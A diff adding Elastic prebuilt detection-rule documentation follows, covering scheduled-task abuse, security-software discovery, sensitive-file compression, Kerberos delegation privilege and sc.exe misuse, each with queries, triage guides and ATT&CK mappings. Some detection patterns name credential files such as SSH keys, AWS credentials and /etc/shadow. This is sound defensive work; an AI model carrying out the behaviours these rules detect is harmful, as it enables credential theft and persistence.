+### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id + [network where host.os.type == "windows" and process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and + network.direction : ("outgoing", "egress") and network.type == "ipv4" and destination.ip != "127.0.0.1" + ] + [file where host.os.type == "windows" and event.type == "creation" and file.extension : ("exe", "dll")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc new file mode 100644 index 0000000000..11da761dd3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc @@ -0,0 +1,101 @@ +[[prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script]] +=== Scheduled Task Created by a Windows Script + +A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +Decode the base64 encoded Tasks Actions registry value to investigate the task's configured action. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 30s + [any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and + process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe")] + [registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc new file mode 100644 index 0000000000..86e4de6d47 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo]] +=== Scheduled Task Execution at Scale via GPO + +Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md +* https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md +* https://labs.f-secure.com/tools/sharpgpoabuse +* https://twitter.com/menasec1/status/1106899890377052160 +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_gpo_scheduledtasks.yml + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Lateral Movement +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Scheduled Task Execution at Scale via GPO + +Group Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `<GPOPath>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml` file. + +#### Possible investigation steps + +- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation. +- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `<Command>` and `<Arguments>` XML tags for any potentially malicious commands or binaries. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO. + +### False positive analysis + +- Verify if the execution is allowed and done under change management, and if the execution is legitimate. + +### Related rules + +- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf +- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- The investigation and containment must be performed in every computer controlled by the GPO, where necessary. +- Remove the script from the GPO. +- Check if other GPOs have suspicious scheduled tasks attached. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.code: "5136" and winlog.event_data.AttributeLDAPDisplayName:("gPCMachineExtensionNames" or "gPCUserExtensionNames") and + winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*)) +or +(event.code: "5145" and winlog.event_data.ShareName: "\\\\*\\SYSVOL" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and + (message: WriteData or winlog.event_data.AccessList: *%%4417*)) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Domain Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Group Policy Modification +** ID: T1484.001 +** Reference URL: https://attack.mitre.org/techniques/T1484/001/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc new file mode 100644 index 0000000000..1c5bd4ca3b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc @@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled]] +=== Scheduled Tasks AT Command Enabled + +Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt" + ) and registry.data.strings : ("1", "0x00000001") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: At +** ID: T1053.002 +** Reference URL: https://attack.mitre.org/techniques/T1053/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc new file mode 100644 index 0000000000..123eea3090 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc @@ -0,0 +1,145 @@ +[[prebuilt-rule-8-10-5-security-software-discovery-via-grep]] +=== Security Software Discovery via Grep + +Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* auditbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Security Software Discovery via Grep + +After successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software. + +This rule looks for the execution of the `grep` utility with arguments compatible to the enumeration of the security software installed on the host. Attackers can use this information to decide whether or not to infect a system, disable protections, use bypasses, etc. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. + +### False positive analysis + +- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and +process.name : "grep" and user.id != "0" and + not process.parent.executable : "/Library/Application Support/*" and + process.args : + ("Little Snitch*", + "Avast*", + "Avira*", + "ESET*", + "BlockBlock*", + "360Sec*", + "LuLu*", + "KnockKnock*", + "kav", + "KIS", + "RTProtectionDaemon*", + "Malware*", + "VShieldScanner*", + "WebProtection*", + "webinspectord*", + "McAfee*", + "isecespd*", + "macmnsvc*", + "masvc*", + "kesl*", + "avscan*", + "guard*", + "rtvscand*", + "symcfgd*", + "scmdaemon*", + "symantec*", + "sophos*", + "osquery*", + "elastic-endpoint*" + ) and + not ( + (process.args : "Avast" and process.args : "Passwords") or + (process.parent.args : "/opt/McAfee/agent/scripts/ma" and process.parent.args : "checkhealth") or + (process.command_line : ( + "grep ESET Command-line scanner, version %s -A2", + "grep -i McAfee Web Gateway Core version:", + "grep --color=auto ESET Command-line scanner, version %s -A2" + ) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Software Discovery +** ID: T1518 +** Reference URL: https://attack.mitre.org/techniques/T1518/ +* Sub-technique: +** Name: Security Software Discovery +** ID: T1518.001 +** Reference URL: https://attack.mitre.org/techniques/T1518/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc new file mode 100644 index 0000000000..ca1b42e7dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc @@ -0,0 +1,112 @@ +[[prebuilt-rule-8-10-5-sensitive-files-compression]] +=== Sensitive Files Compression + +Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and + process.name:(zip or tar or gzip or hdiutil or 7z) and + process.args: + ( + /root/.ssh/id_rsa or + /root/.ssh/id_rsa.pub or + /root/.ssh/id_ed25519 or + /root/.ssh/id_ed25519.pub or + /root/.ssh/authorized_keys or + /root/.ssh/authorized_keys2 or + /root/.ssh/known_hosts or + /root/.bash_history or + /etc/hosts or + /home/*/.ssh/id_rsa or + /home/*/.ssh/id_rsa.pub or + /home/*/.ssh/id_ed25519 or + /home/*/.ssh/id_ed25519.pub or + /home/*/.ssh/authorized_keys or + /home/*/.ssh/authorized_keys2 or + /home/*/.ssh/known_hosts or + /home/*/.bash_history or + /root/.aws/credentials or + /root/.aws/config or + /home/*/.aws/credentials or + /home/*/.aws/config or + /root/.docker/config.json or + /home/*/.docker/config.json or + /etc/group or + /etc/passwd or + /etc/shadow or + /etc/gshadow + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Credentials In Files +** ID: T1552.001 +** Reference URL: https://attack.mitre.org/techniques/T1552/001/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Archive Collected Data +** ID: T1560 +** Reference URL: https://attack.mitre.org/techniques/T1560/ +* Sub-technique: +** Name: Archive via Utility +** ID: T1560.001 +** Reference URL: https://attack.mitre.org/techniques/T1560/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc new file mode 100644 index 0000000000..90f1243803 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc @@ -0,0 +1,119 @@ +[[prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user]] +=== Sensitive Privilege SeEnableDelegationPrivilege assigned to a User + +Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_alert_active_directory_user_control.yml +* https://twitter.com/_nwodtuhs/status/1454049485080907776 +* https://www.thehacker.recipes/ad/movement/kerberos/delegations +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0105_windows_audit_authorization_policy_change.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Persistence +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User + +Kerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts, act on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured for user and computer objects. + +Enabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket (TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation when needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they could extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged user to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will be able to pass-the-ticket to privileged assets. + +SeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller and is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for delegation**. + +It is critical to control the assignment of this privilege. A user with this privilege and write access to a computer can control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to the system. + +#### Possible investigation steps + +- Investigate how the privilege was assigned to the user and who assigned it. +- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the `user.id` and `winlog.activity_id` fields as a filter during the past 48 hours. +- Investigate other alerts associated with the users/host during the past 48 hours. + +### False positive analysis + +- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your environment legitimately, the security team should notify the administrators about the risks of using it. + +### Related rules + +- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Remove the privilege from the account. +- Review the privileges of the administrator account that performed the action. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Authorization Policy Change" and event.code:4704 and + winlog.event_data.PrivilegeList:"SeEnableDelegationPrivilege" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal or Forge Kerberos Tickets +** ID: T1558 +** Reference URL: https://attack.mitre.org/techniques/T1558/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc new file mode 100644 index 0000000000..a6ed51a8be --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc @@ -0,0 +1,165 @@ +[[prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter]] +=== Service Control Spawned via Script Interpreter + +Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* logs-system.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Service Control Spawned via Script Interpreter + +Windows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components. + +The `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics. + - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the service or restore it to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +/* This rule is not compatible with Sysmon due to user.id issues */ + +process where host.os.type == "windows" and event.type == "start" and + (process.name : "sc.exe" or process.pe.original_file_name == "sc.exe") and + process.parent.name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", + "wmic.exe", "mshta.exe","powershell.exe", "pwsh.exe") and + process.args:("config", "create", "start", "delete", "stop", "pause") and + /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */ + not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** 